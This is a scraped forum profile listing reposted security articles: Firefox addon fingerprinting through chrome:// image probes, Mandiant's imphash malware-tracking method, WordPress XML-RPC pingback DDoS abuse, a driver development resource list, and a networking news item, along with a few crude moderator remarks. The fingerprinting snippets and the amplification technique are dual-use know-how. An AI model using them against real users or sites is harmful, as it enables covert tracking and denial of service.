-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
Dirty Browser Enumeration Tricks – Using chrome:// and about:
Nytro posted a topic in Securitate web
Dirty Browser Enumeration Tricks – Using chrome:// and about: to Detect Firefox & Plugins After playing around with some of the cool Firefox Easter eggs I had an interesting thought about the internal chrome:// resources in the Firefox web browser. In a previous post I found that I could access local Firefox resources such as style-sheets, images, and other local content in any public web page. For example, if you’re using the Firefox web browser, you know what the following image is: For everyone else, the above image is broken. This is because the image is actually a link to “about:logo”. It’s a reference to a local resource only found in Firefox flavored web browsers. When the image is viewed in Chrome, Internet Explorer, or Safari, the reference doesn’t exist and the image link is broken. Alright, how about a consolation prize – what about this image? That may be cool, but it does beg the question – can we abuse this? Of course we can! Subverting Same Origin for Browser & Plugin Identification With a little bit of trickery we can use these local references to: 1. Identify Firefox with 100% accuracy 2. Identify any Firefox plugins with special “chrome.manifest” settings (to be covered below) This can be done by doing something like the following: <img src="about:logo" onload="alert('Browser is Firefox!')" /> [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]<img src="about:logo" onload="alert('Browser is Firefox!')" /> [/TD] [/TR] [/TABLE] Simply enough, if you get a JavaScript alert – you’re using Firefox! (Interestingly enough, this doesn’t work on the Tor browser. Perhaps due to the NoScript addon?) The same trick can be used to identify some plugins as well. For example if you are using the “Resurrect Pages” plugin, you can see the following image: Using the same tactic as above, we can enumerate the install of “Resurrect Pages” via the following: <img src="chrome://resurrect/skin/cacheicons/google.png" onload="alert('Browser has Resurrect Pages installed!')" /> [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]<img src="chrome://resurrect/skin/cacheicons/google.png" onload="alert('Browser has Resurrect Pages installed!')" /> [/TD] [/TR] [/TABLE] So, how do we know what plugins this works for? From the Mozilla Developer Network: “Chrome resources can no longer be referenced from within <img>, <script>, or other elements contained in, or added to, content that was loaded from an untrusted source. This restriction applies to both elements defined by the untrusted source and to elements added by trusted extensions. If such references need to be explicitly allowed, set the contentaccessible flag to yes to obtain the behavior found in older versions of Firefox.” https://developer.mozilla.org/en-US/docs/Chrome_Registration To put it short, if the plugin has a line like the following in it’s “chrome.manifest” file: content packagename chrome/path/ contentaccessible=yes [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]content packagename chrome/path/ contentaccessible=yes [/TD] [/TR] [/TABLE] Then the plugin’s resources can be included just like any other web resource. Which means if the plugin has any style-sheets, images, or JavaScript – it can be enumerated! When I was first investigating this behavior I thought I was original, but of course others have attempted this as well: Firefox add-on detection with Javascript | WebDevWonders.com Detecting FireFox Extentions ha.ckers.org web application security lab Oh well, let’s do it on a bigger scale! Gathering Firefox Addon Analytics In order to get a comprehensive list of which addons had set this “contentaccessible” flag to “yes”, I scraped ~12K addons from the Firefox Addons website. Each addon XPI was parsed for it’s “chrome.manifest” file for the “contentaccessible=yes” flag. If the flag existed, the proper chrome URI was generated for each file in the content path. These path’s were then used to construct a JavaScript scanner that works by making references to these chrome URIs and checking if they are valid via the “onload” event. The completed scanner: After taking analytics on all of these addons it was found that only a mere ~400 had the proper contentaccessible flag combined with detectable resources. By detectable resources I mean resources such as JavaScript, CSS, or images that could be embedded and detected. This means that out of all the addons, only about ~3.3% could be detected in this manor. Although there are other methods of detecting the presence of Firefox addons. For example, despite the Adblock Plus addon not having a contentaccessible flag, it can be detected by attempting to make a script or image reference to a blocked domain. If the reference fails to load on a file that is perfectly valid, we know it is being blocked by Adblock Plus or some other anti advertisement addon. In the same manor we could fingerprint which Adblock Plus list is being used. The detection of addons is quite quick and only takes a few seconds to complete. This is due to the fact that the references are local, so they aren’t being grabbed off a webserver but directly from the browser itself. To try the scanner out in your Firefox browser, see the following link: Firefox Plugin Detector For other hackers or web developers, a full JSON dump of the data collected is available here (warning, big file!). This contains data on publicly accessible chrome:// URIs as well as basic information on every addon collected. I’d link to the dump of all the Firefox addon XPIs downloaded but it goes well over a gigabyte in size and I’m not sure if re-hosting addons is allowed. As a final point, being able to access this data has another advantage. If any information is leaked in the JavaScript resources such as local filesystem references, OS information, etc, this could be included and potentially could leak sensitive information. After checking many of the chrome:// resources inside Firefox itself I found that most references to the browser’s version or other information have been crudely commented out. I assume because someone else has attempted this style of enumeration before. Not to mention if the content is vulnerable to XSS, you have remote code execution due to the JavaScript running at the same level as a Firefox addon. Until next time, -mandatory Sursa: Dirty Browser Enumeration Tricks - Using chrome:// and about: to Identify Firefox & Plugins | The Hacker Blog -
UCLA, Cisco & more join forces to replace TCP/IP Named Data Networking Consortium makes its debut in LA By Bob Brown Sep 4, 2014 12:05 PM Big name academic and vendor organizations have unveiled a consortium this week that's pushing Named Data Networking (NDN), an emerging Internet architecture designed to better accommodate data and application access in an increasingly mobile world. The Named Data Networking Consortium members, which include universities such as UCLA and China's Tsinghua University as well as vendors such as Cisco and VeriSign, are meeting this week at a two-day workshop at UCLA to discuss NDN's promise for scientific research. Big data, eHealth and climate research are among the application areas on the table. The NDN effort has been backed in large part by the National Science Foundation, which has put more than $13.5 million into it since 2010. Since that time, participating organizations have somewhat quietly been working on new protocols and specifications, including a new packet format, that have been put through their paces in a testbed that spans from the United States to Asia. Their aim is to put forth an Internet architecture that's more secure, able to support more bandwidth and friendlier to app developers. Cryptographic authentication, flow balance and adaptive routing/forwarding are among the key underlying principles. UCLA has been particularly involved in the NDN effort, and the consortium has been organized by researchers from the UCLA Henry Samueli School of Engineering and Applied Science. Interestingly, among those involved is Jeff Burke, Assistant Dean for Technology and Innovation at the UCLA School of Theater, Film and Television, emphasizing the interdisciplinary approach being taken with NDN. Co-leaders of the project are Lixia Zhang, UCLA’s Jonathan B. Postel Chair in Computer Science, and Van Jacobson, an Internet Hall of Famer and adjunct professor at UCLA. NDN has its roots in content-centric networking, a concept that Jacobson started at Xerox PARC. Other participants are in charge of various aspects of the project: Washington University in St. Louis, for instance, is spearheading scalable NDN forwarding technologies and managing the global testbed. It's no surprise to see Cisco getting into NDN early either (it costs $25K for commercial entities to join, though is free for certain academic institutions). David Oran, a Cisco Fellow and VoIP expert, said in a statement that the consortium "will help evolve NDN by establishing a multifaceted community of academics, industry and users. We expect this consortium to be a major help in advancing the design, producing open-source software, and fostering standardization and adoption of the technology.” Sursa: Cisco, UCLA & more launch Named Data Networking Consortium
-
Tracking Malware with Import Hashing By Mandiant on January 23, 2014 Tracking threat groups over time is an important tool to help defenders hunt for evil on networks and conduct effective incident response. Knowing how certain groups operate makes for an efficient investigation and assists in easily identifying threat actor activity. At Mandiant, we utilize several methods to help identify and correlate threat group activity. A critical piece of our work involves tracking various operational items such as attacker infrastructure and email addresses. In addition, we track the specific backdoors each threat group utilizes – one of the key ways to follow a group’s activities over time. For example, some groups may favor the SOGU backdoor, while others use HOMEUNIX. One unique way that Mandiant tracks specific threat groups’ backdoors is to track portable executable (PE) imports. Imports are the functions that a piece of software (in this case, the backdoor) calls from other files (typically various DLLs that provide functionality to the Windows operating system). To track these imports, Mandiant creates a hash based on library/API names and their specific order within the executable. We refer to this convention as an “imphash” (for “import hash”). Because of the way a PE’s import table is generated (and therefore how its imphash is calculated), we can use the imphash value to identify related malware samples. We can also use it to search for new, similar samples that the same threat group may have created and used. Though Mandiant has been leveraging this technique for well over a year internally, we aren’t the first to publicly discuss this. An imphash is a powerful way to identify related malware because the value itself should be relatively unique. This is because the compiler’s linker generates and builds the Import Address Table (IAT) based on the specific order of functions within the source file. Take the following example source code: #include <windows.h>#include <stdio.h> #include <stdlib.h> #include <wininet.h> #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "wininet.lib") int makeMutexA() { CreateMutexA(NULL, FALSE, "TestMutex"); return 0; } int makeMutexW() { CreateMutexW(NULL, FALSE, L"TestMutex"); return 0; } int makeUserAgent() { HANDLE hInet=0, hConn=0; char buf[sizeof(struct hostent)] = {0}; hInet = InternetOpenA("User-Agent: (Windows; 5.1)", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); hConn = InternetConnectA(hInet, "www.google.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); WSAAsyncGetHostByName(NULL, 3, "www.yahoo.com", buf, sizeof(struct hostent)); return 0; } int main(int argc, char *argv[]) { makeMutexA(); makeMutexW(); makeUserAgent(); return 0; } When that source file is compiled, the resulting import table looks as follows: ws2_32.dll ws2_32.dll.WSAAsyncGetHostByName wininet.dll wininet.dll.InternetOpenAwininet.dll.InternetConnectA kernel32.dll kernel32.dll.InterlockedIncrement kernel32.dll.IsProcessorFeaturePresent kernel32.dll.GetStringTypeW kernel32.dll.MultiByteToWideChar kernel32.dll.LCMapStringW kernel32.dll.CreateMutexA kernel32.dll.CreateMutexW kernel32.dll.GetCommandLineA kernel32.dll.HeapSetInformation kernel32.dll.TerminateProcess Imphash: 0c6803c4e922103c4dca5963aad36ddf We abbreviated the table to save space, but the red/bolded APIs are the ones referenced in the source code. Note the order in which they appear in the table, and compare that to the order in which they appear in the source file. If an author were to change the order of the functions and/or the order of the API calls in the source code, this would in turn affect the compiled import table. Take the previous example, modified: #include <windows.h>#include <stdio.h> #include <stdlib.h> #include <wininet.h> #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "wininet.lib") int makeMutexW() { CreateMutexW(NULL, FALSE, L"TestMutex"); return 0; } int makeMutexA() { CreateMutexA(NULL, FALSE, "TestMutex"); return 0; } int makeUserAgent() { HANDLE hInet=0, hConn=0; char buf[sizeof(struct hostent)] = {0}; hConn = InternetConnectA(hInet, "www.google.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); hInet = InternetOpenA("User-Agent: (Windows; 5.1)", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); WSAAsyncGetHostByName(NULL, 3, "www.yahoo.com", buf, sizeof(struct hostent)); return 0; } int main(int argc, char *argv[]) { makeMutexA(); makeMutexW(); makeUserAgent(); return 0; } In this example, we have reversed the order of makeMutexW and makeMutexA, and of InternetConnectA and InternetOpenA. (Note that this would be an invalid sequence of API calls, but we use it here to illustrate the point.) Below is the import table generated from this modified source code (again abbreviated); note the changes when compared to the original IAT, above, as well as the different imphash value: ws2_32.dll ws2_32.dll.WSAAsyncGetHostByName wininet.dll wininet.dll.InternetConnectAwininet.dll.InternetOpenA kernel32.dll kernel32.dll.InterlockedIncrement kernel32.dll.IsProcessorFeaturePresent kernel32.dll.GetStringTypeW kernel32.dll.MultiByteToWideChar kernel32.dll.LCMapStringW kernel32.dll.CreateMutexWkernel32.dll.CreateMutexA kernel32.dll.GetCommandLineA kernel32.dll.HeapSetInformation kernel32.dll.TerminateProcess Imphash: b8bb385806b89680e13fc0cf24f4431e The final example shows how the ordering of included files at compile time will affect the resulting IAT (and thus the resulting imphash value). We’ll expand on our original example by adding files imphash1.c and imphash2.c, to be included with our original source file imphash.c: -- imphash1.c -- int makeNamedPipeA(){ HANDLE ph = CreateNamedPipeA("\\\\.\\pipe\\test_pipe", PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 128, 64, 200, NULL); return 0; } -- imphash2.c -- int makeNamedPipeW() { HANDLE ph2 = CreateNamedPipeW(L"\\\\.\\pipe\\test_pipeW", PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 128, 64, 200, NULL); return 0; } -- imphash.c -- #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <wininet.h> #include “imphash1.h” #include “imphash2.h” #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "wininet.lib") int makeMutexW() { CreateMutexW(NULL, FALSE, L"TestMutex"); return 0; } int makeMutexA() { CreateMutexA(NULL, FALSE, "TestMutex"); return 0; } int makeUserAgent() { HANDLE hInet = 0, hConn = 0; char buf[sizeof(struct hostent)] = {0}; hConn = InternetConnectA(hInet, "www.google.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); hInet = InternetOpenA("User-Agent: (Windows; 5.1)", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); WSAAsyncGetHostByName(NULL, 3, "www.yahoo.com", buf, sizeof(struct hostent)); return 0; } int main(int argc, char *argv[]) { makeMutexA(); makeMutexW(); makeUserAgent(); makeNamedPipeA(); makeNamedPipeW(); return 0; } Using the following command to build the EXE: cl imphash.c imphash1.c imphash2.c /W3 /WX /link The resulting IAT is: ws2_32.dll ws2_32.dll.WSAAsyncGetHostByName wininet.dll wininet.dll.InternetConnectA wininet.dll.InternetOpenA kernel32.dll kernel32.dll.TlsFree kernel32.dll.IsProcessorFeaturePresent kernel32.dll.GetStringTypeW kernel32.dll.MultiByteToWideChar kernel32.dll.LCMapStringW kernel32.dll.CreateMutexW kernel32.dll.CreateMutexA kernel32.dll.CreateNamedPipeAkernel32.dll.CreateNamedPipeW kernel32.dll.GetCommandLineA kernel32.dll.HeapSetInformation kernel32.dll.TerminateProcess Imphash: 9129bdbc18cfd1aba498c94e809567d5 Changing the order of includes for imphash1.h and imphash2.h within the source file imphash.c will have no effect on the ordering of the IAT. However, changing the order of the files on the command line and recompiling will affect the IAT; note the re-ordering of CreateNamedPipeW and CreateNamedPipeA: cl imphash.c imphash2.c imphash1.c /W3 /WX /link ws2_32.dll ws2_32.dll.WSAAsyncGetHostByName wininet.dll wininet.dll.InternetConnectA wininet.dll.InternetOpenA kernel32.dll kernel32.dll.TlsFree kernel32.dll.IsProcessorFeaturePresent kernel32.dll.GetStringTypeW kernel32.dll.MultiByteToWideChar kernel32.dll.LCMapStringW kernel32.dll.CreateMutexW kernel32.dll.CreateMutexA kernel32.dll.CreateNamedPipeWkernel32.dll.CreateNamedPipeA kernel32.dll.GetCommandLineA kernel32.dll.HeapSetInformation kernel32.dll.TerminateProcess Imphash: c259e28326b63577c31ee2c01b25d3fa These examples show that both the ordering of functions within the original source code – as well as the ordering of source files at compile time – will affect the resulting IAT, and therefore the resulting imphash value. Because the source code is not organized the same way, two different binaries with exactly the same imports are highly likely to have different import hashes. Conversely, if two files have the same imphash value, they have the same IAT, which implies that the files were compiled from the same source code, and in the same manner. For packed samples, simple tools or utilities (with few imports and, based on their simplicity, likely compiled in the same way), the imphash value may not be unique enough to be useful for attribution. In other words, it may be possible for two different threat actors to independently generate tools with the same imphash based on those factors. However, for more complex and/or custom tools (like backdoors), where there are a sufficient number of imports present, the imphash should be relatively unique, and can therefore be used to identify code families that are structurally similar. While files with the same imphash are not guaranteed to originate from the same threat group (it’s possible, for example, for the files were generated by a common builder that is shared among groups) the files can at least be reasonably assumed to have a common origin and may eventually be attributable to a single threat group with additional corroborating information. Employing this method has given us great success for verifying attacker backdoors over a period of time and demonstrating relationships between backdoors and their associated threat groups. Mandiant has submitted a patch that enables the calculation of the imphash value for a given PE to Ero Carrera’s pefile (pefile - pefile is a Python module to read and work with PE (Portable Executable) files - Google Project Hosting). Example code: import pefile pe = pefile.PE(sys.argv[1]) print “Import Hash: %s” % pe.get_imphash() Mandiant uses an imphash convention that requires that the ordinals for a given import be mapped to a specific function. We’ve added a lookup for a couple of DLLs that export functions commonly looked up by ordinal to pefile. Mandiant’s imphash convention requires the following: Resolving ordinals to function names when they appear Converting both DLL names and function names to all lowercase Removing the file extensions from imported module names Building and storing the lowercased string . in an ordered list Generating the MD5 hash of the ordered list This convention is implemented in pefile.py version 1.2.10-139 starting at line 3618. If imphash values serve as relatively unique identifiers for malware families (and potentially for specific threat groups), won’t discussing this technique alert attackers and cause them to change their methods? Attackers would need to modify source code (in a way that did not affect the functionality of the malware itself) or change the file order at compile time (assuming the source code is spread across multiple files). While attackers could write tools to modify the imphash, we don’t expect many attackers to care enough to do this. We believe it is important to add imphash to the lexicon as a way to discuss malware samples at a higher level and to exchange information about attackers and threat groups. For example, incident responders can use imphash values to discuss malware without specifically disclosing which exact sample (specific MD5) is being discussed. Consider a scenario where an attacker compiles 30 variants of its backdoor with different C2 locations and campaign IDs and deploys them to various companies. If a blog post comes out stating that a specific MD5 was identified as part of a campaign, then based on that MD5 the attacker immediately knows what infrastructure (such as C2 domains or associated IP addresses) is at stake and which campaign may be in jeopardy. However, if the malware was identified just by its imphash value, it is possible that the imphash is shared across all 30 of the attacker’s variants. The malware is still identifiable by and can be discussed within the security community, but the attacker doesn’t know which specific samples have been identified or which parts of their infrastructure are in jeopardy. To demonstrate the effectiveness of this analysis method, we’ve decided to share the imphash values of a few malware families from the Mandiant APT1 report: [TABLE] [TR] [TH]Family Name[/TH] [TH]Import Hash[/TH] [TH]Total Imports[/TH] [TH]Number of matched Samples[/TH] [/TR] [TR] [TD]GREENCAT[/TD] [TD]2c26ec4a570a502ed3e8484295581989[/TD] [TD]74[/TD] [TD]23[/TD] [/TR] [TR] [TD]GREENCAT[/TD] [TD]b722c33458882a1ab65a13e99efe357e[/TD] [TD]74[/TD] [TD]18[/TD] [/TR] [TR] [TD]GREENCAT[/TD] [TD]2d24325daea16e770eb82fa6774d70f1[/TD] [TD]113[/TD] [TD]13[/TD] [/TR] [TR] [TD]GREENCAT[/TD] [TD]0d72b49ed68430225595cc1efb43ced9[/TD] [TD]100[/TD] [TD]13[/TD] [/TR] [TR] [TD]STARSYPOUND[/TD] [TD]959711e93a68941639fd8b7fba3ca28f[/TD] [TD]62[/TD] [TD]31[/TD] [/TR] [TR] [TD]COOKIEBAG[/TD] [TD]4cec0085b43f40b4743dc218c585f2ec[/TD] [TD]79[/TD] [TD]10[/TD] [/TR] [TR] [TD]NEWSREELS[/TD] [TD]3b10d6b16f135c366fc8e88cba49bc6c[/TD] [TD]77[/TD] [TD]41[/TD] [/TR] [TR] [TD]NEWSREELS[/TD] [TD]4f0aca83dfe82b02bbecce448ce8be00[/TD] [TD]80[/TD] [TD]10[/TD] [/TR] [TR] [TD]TABMSGSQL[/TD] [TD]ee22b62aa3a63b7c17316d219d555891[/TD] [TD]102[/TD] [TD]9[/TD] [/TR] [TR] [TD]WEBC2[/TD] [TD]a1a42f57ff30983efda08b68fedd3cfc[/TD] [TD]63[/TD] [TD]25[/TD] [/TR] [TR] [TD]WEBC2[/TD] [TD]7276a74b59de5761801b35c672c9ccb4[/TD] [TD]52[/TD] [TD]13[/TD] [/TR] [/TABLE] We calculated the above malware families and corresponding imphash values over the set of malware from the Mandiant APT1 report released in February 2013. Using the imphash method described above, we calculated imphash values over all the samples, and then counted the total number of samples that matched on each imphash. Using 356 total samples from the report, we were able to identify 11 imphash values that provided significant coverage of their respective families. Pivoting from these imphash values, we were able to identify additional malware samples that further analysis showed were part of the same malware families and attributable to the same threat group. Imphash analysis, like any other method, has its limitations and should not be considered a single point of success. Just because two binaries have the same imphash value does not mean they belong to the same threat group, or even that they are part of the same malware family (though there is an increased likelihood that this is the case). Imphash analysis is a low-cost, efficient and valuable way to triage potential malware samples and expand discovery by identifying “interesting” samples that merit further analysis. The imphash value gives analysts another pivot point when conducting discovery on threat groups and their tools. Employing this method can also yield results in tracking and verifying attacker backdoors over time, and it can assist in exposing relationships between backdoors and threat groups. Happy Hunting! Sursa: https://www.mandiant.com/blog/tracking-malware-import-hashing/
-
Security issues in WordPress XML-RPC DDoS Explained G_Victor| September 4, 2014 A number of months ago a DDoS attack against a website used a functionality in all WordPress sites since 2005 as an amplification vector. According to one report more than 162,000 WordPress Sites sent requests to the target. What is this DDoS? WordPress has a feature that can send requests to another WordPress site. This function has been abused for several years and just a few months ago a DDoS attack was mounted again using the XML-RPC feature to amplify the Pingbacks to an unsuspected target. WordPress Prevelance WordPress is everywhere. About 22% of all sites on the Internet are WordPress sites according to Akamai’s State of the Internet Q1 2014 Report. It powers sites small to large. What is it? WordPress and XML-RPC WordPress is a Content Management System for blogging using plugin architecture and templates. XML-RPC is a specification explaining how a HTTP-POST request and XML as the encoding allows software running on different operating systems, in different environments to make procedure calls over the Internet. This feature has been available in WordPress since version 3.5. An administrator can manage almost any aspect of the WordPress installation from any application that implements XMLRPC such as a mobile device. Users, posts, pages or tags can be created, modified and deleted by administrators. How is it used? For Good. According to the specification this is the minimal requirements to receive a list of methods WordPress supports: A list that uses the XML-RPC WordPress API can be found here XML-RPC WordPress API « WordPress Codex The Attack. What Is Pingback And How Does It Work? One such method is pingback.ping, which is a feature that links one post from one site, to another post in another site. Another way to put it is that, SiteA is notified that SiteB has linked back to it. The advantage of this is that SiteA increases its credibility by most search engines standards and SiteB cites authorship. How Can It Be Abused? DDoS Attack? Even though this “bug” was documented in 2007 (https://core.trac.wordpress.org/ticket/4137), and WordPress has attempted to reduce the vulnerability of the attack, in March 2014, more than 160,000 WordPress site used this amplification technique to perform a DDoS attack against a single site. All that was necessary was the source and target URI. The Taxonomy Of The Attack To craft the attack simply POST a request like this: With this call the Target receives a GET request to the non-existent page forcing a full page reload and taking away resources needed for legitimate users. If many WordPress sites all point to the same site, the Target will experience a DDoS. The Source can be any URL. Defend Yourselves A WordPress site owner can defend against being used as pivot point in launching a DDoS by upgrading to the latest WordPress, either on the Dashboard or download it here. https://wordpress.org/latest.zip About HP Fortify on Demand HP Fortify on Demand is a cloud-based application security testing solution. We perform multiple types of manual and automated application security testing, including web assessments, mobile application security assessments, thick client testing, and ERP testing, etc. We do it both statically and dynamically, both in the cloud and on premise. Sursa: Security issues in WordPress XML-RPC DDoS Explaine... - HP Enterprise Business Community
-
Am modificat putin organizarea forumului pentru a scoate in evidenta tutorialele. Cred ca este destul de vizibil. Poate astfel o sa va atraga mai mult atentia.
-
Pizdelor.
-
De astăzi, stocarea datelor personale nu mai este permisă
Nytro replied to dicksi's topic in Stiri securitate
Muie garda. -
- 16 replies
-
- cont filelist
- filelist invitatii
-
(and 1 more)
Tagged with:
-
Device Driver Development for Beginners - Reloaded by Evilcry » Mon Oct 04, 2010 8:14 am Hi, This is just a little starter for people interested in starting Kernel-Mode Development By following an good thread on UIC forum, opened by a beginner that wanted to know how to start with Device Driver Development, I remembered that long time ago published a similar blog post on that subject. Now I'm going to Reload and Expand it. Development Tools 1. WDK/DDK - this is the proper Driver Development SDK given by Microsoft, latest edition can be dowloaded How to Get the WDK 2. Visual Studio 2008/2010 - you can also develop without VS, but I always prefer all the Comforts given by a such advanced IDE, especially in presence of complex device drivers. 3. DDKWizard - DDKWizard is a so-called project creation wizard (for VisualStudio) that allows you to create projects that use the DDKBUILD scripts from OSR (also available in the download section from this site). The wizard will give you several options to configure your project prior to the creation. You can download it Welcome to the DDKWizard homepage 4. VisualAssist - (Optional Tool) Visual Assist X provides productivity enhancements that help you read, write, navigate and refactor code with blazing speed in all Microsoft IDEs. You can Try/Buy it Visual Assist - a Visual Studio extension by Whole Tomato Software 5. VisualDDK - Develop and Debug drivers directly from VS, enjoy debugging your driver directly from Visual Studio, speeding up debugging ~18x for VMWare and ~48x for VirtualBox. Download and Step by Step Quick Start Guide VisualDDK - Quickstart 6. Virtual Machine - You need a Virtual Machine to perform efficient Driver Debugging, best options are VMWare or VirtualBox. Building a Driver Development Environment As you can see, a good comfortable Driver Development station is composed by a good amount of components, so we need an installation order. 1. Install your IDE - VisualStudio2008 or VisualStudio2010 2. Install WDK package 3. Install DDKWizard 4. Download and place ( usually into C:\WinDDK ) ddkbuild.cmd 5. By following DDKWizard pdf you will be driven to add an new Envirnment Variable directly releated to the OS version in which you are developing and successively add a reference of ddkbuild.cmd into VS IDE. DDWizard Manual is very well written. 6. After finishing DDKWizard integration you can test if your environment is correctly installed, by compilig your first driver. Steps are easy open VS and select DDKWizard templare (not EmptyDriver), you will see the skeleton of a Driver, all what you have to do is to Build Solution and Verify if No Compiling Errors occur, your station is correctly installed. 7. Install VirtualMachine 8. Integrate Debugging help of VisualDDK by following step by step quick start guide 9. Install Visual Assist (this can be done in every moment after VS Installation) Additional Tools * DeviceTree - This utility has two views: (a) one view that will show you the entire PnP enumeration tree of device objects, including relationships among objects and all the device's reported PnP characteristics, and ( a second view that shows you the device objects created, sorted by driver name. There is nothing like this utility available anywhere else. Download it Downloads:DeviceTree * IrpTracker - IrpTracker allows you to monitor all I/O request packets (IRPs) on a system without the use of any filter drivers and with no references to any device objects, leaving the PnP system entirely undisturbed. In addition to being able to see the path the IRP takes down the driver stack and its ultimate completion status, a detailed view is available that allows you to see the entire contents of static portion of the IRP and an interpreted view of the current and previous stack locations. Download it Downloads:IrpTracker * DebugMon - Displays DbgPrint messages generated by any driver in the system (or the OS itself) in the application window. Can be used either in local mode or can send the DbgPrint messages to another system via TCP/IP. Download it Downloads:DebugMon * DriverLoader - This GUI-based tool will make all the appropriate registry entries for your driver, and even allow you to start your driver without rebooting. It's even got a help file, for goodness sakes! If you write drivers, this is another one of those utilities that's a must have for your tool chest. x86 architecture. Dowload it Downloads:Driver Loader Now you have a full working Develop and Debug Station. As you should imagine, dealing with driver development implies working with at Kernel Mode, a task pretty challenging, delicate and complex. A badly written driver lead to OS Crash and/or dangerous bugs, just think about a driver used in mission-critical applications like Surgery, a bug or a crash could lead to extremely big dangers. The driver need to be: * Bug Free * Fault Tolerant * Ready to Endure all Stress Situations This could be done, only by the driver coder, with a large knowledge of following fields: * Hardware Architecture * Operating System Architecture * Kernel and User Mode Architecture * Rock Solid C language knowledge * Debugging Ability Here i'm going to enumerate necessary Documentation/Book/Etc. necessary to acheive a *good and solid* background and advanced knowledge about driver coding. Microsoft WDK Page: Windows 8.1: Download kits and tools Will give you informations about: 1. WDM ( Windows Driver Model) 2. WDF (Windows Driver Foundation) 3. IFS Kit (Installable FileSystem Kit) 4. Driver Debugging 5. Driver Stress Testing ( DriverVerifier tool ) PC Fundamentals: Windows Hardware Design Articles (Windows Drivers) Device Fundamentals: Windows Hardware Design Articles (Windows Drivers) This will give you an large view of 'what mean developing a driver' which components are touched and which aspects you need to know. It's also obviously necessary to have a Reference about kernel mode involved Functions and Mechanisms, the first best resource is always MSDN, here the starter link to follow MSDN->DDK http://msdn.microsoft.com/en-us/library ... 85%29.aspx How to start Learning As pointed out in the previous blog post, one of the best starting point, that will give you an on-fly-view of development topics is the Toby Opferman set of articles: Driver Development Part 1: Introduction to Drivers Driver Development Part 1: Introduction to Drivers - CodeProject Driver Development Part 2: Introduction to Implementing IOCTLs Driver Development Part 2: Introduction to Implementing IOCTLs - CodeProject Driver Development Part 3: Introduction to driver contexts Driver Development Part 3: Introduction to driver contexts - CodeProject Driver Development Part 4: Introduction to device stacks Driver Development Part 4: Introduction to device stacks - CodeProject Driver Development Part 5: Introduction to the Transport Device Interface Driver Development Part 5: Introduction to the Transport Device Interface - CodeProject Driver Development Part 6: Introduction to Display Drivers Driver Development Part 6: Introduction to Display Drivers - CodeProject It's really important to put in evicence MemoryManagement at KernelMode, the best starting point for these aspects are tutorials written by four-f; http://www.freewebs.com/four-f/ Handling IRPs: What Every Driver Writer Needs to Know http://download.microsoft.com/download/ ... a/IRPs.doc Book Resources Tutorial are a great starting point, but a solid understanding is given by a set of 'abstracts', emerges the necessity of a good Book Collection: Windows NT Device Driver Development (OSR Classic Reprints) http://www.amazon.com/Windows-Device-De ... 242&sr=8-2 Windows®-Internals-Including-Windows-PRO-Developer http://www.amazon.com/Windows%C2%AE-Int ... 160&sr=8-1 The Windows 2000 device driver book: a guide for programmers http://www.amazon.com/Windows-2000-Devi ... 0130204315 Windows NT/2000 Native API Reference http://www.amazon.com/Windows-2000-Nati ... 201&sr=8-1 Undocumented Windows 2000 Secrets Undocumented Windows 2000 Secrets Developing Drivers with WDF Developing Drivers with the Windows Driver Foundation: Reference Book (Windows Drivers) Windows NT File System Internals, A Developer's Guide Windows NT File System Internals*-*O'Reilly Media Web Resources The first and most important resource about Windows Driver Development is OSROnline: OSR Online - The Home Page for Windows Driver Developers I strongly suggest you to subscribe: 1. The NT Insider 2. NTDEV MailingList 3. NTFSD MailingList NDIS Developer's Reference NDIS Developer's Reference Information, Articles, and Free Downloads Resources The Undocumented Functions NTAPI Undocumented Functions Blog MSDN driver writing != bus driving - Site Home - MSDN Blogs Windows Vista Kernel Structures Windows Vista Kernel Structures Peter Wieland's thoughts on Windows driver development Pointless Blathering - Site Home - MSDN Blogs USB Driver Development Microsoft Windows USB Core Team Blog - Site Home - MSDN Blogs Hardware and Driver Developer Blogs Support and community for Windows hardware developers Developer Newsgroups • microsoft.public.development.device.drivers • microsoft.public.win32.programmer.kernel • microsoft.public.windbg KernelmodeInfo Blog CURRENT_IRQL j00ru//vx tech blog Coding, reverse engineering, OS internals Blog j00ru//vx tech blog Nynaeve Nynaeve DumpAnalysis Blog Software Diagnostics Institute | Structural and Behavioral Patterns for Software Diagnostics, Forensics and Prognostics. Software Diagnostics Library. Analyze -v Blog http://analyze-v.com/ Instant Online Crash Dump Analysis Instant Online Crash Analysis Winsock Kernel (WSK) Winsock Kernel (Windows Drivers) Transport Driver Interface (TDI) _ Network Driver Interface Specification (NDIS) The NDIS blog - Site Home - MSDN Blogs System Internals System Internals (Windows Drivers) Driver development needs too many time patience and experience to be fully understood, in my opinion the best approach remains LbD ( Learning by Doing ) so, read, study and develop as many experience you build less BSODs and "trange behavior" you will obtain See you to the next post, Giuseppe 'Evilcry' Bonfa Sursa: KernelMode.info • View topic - Device Driver Development for Beginners - Reloaded
-
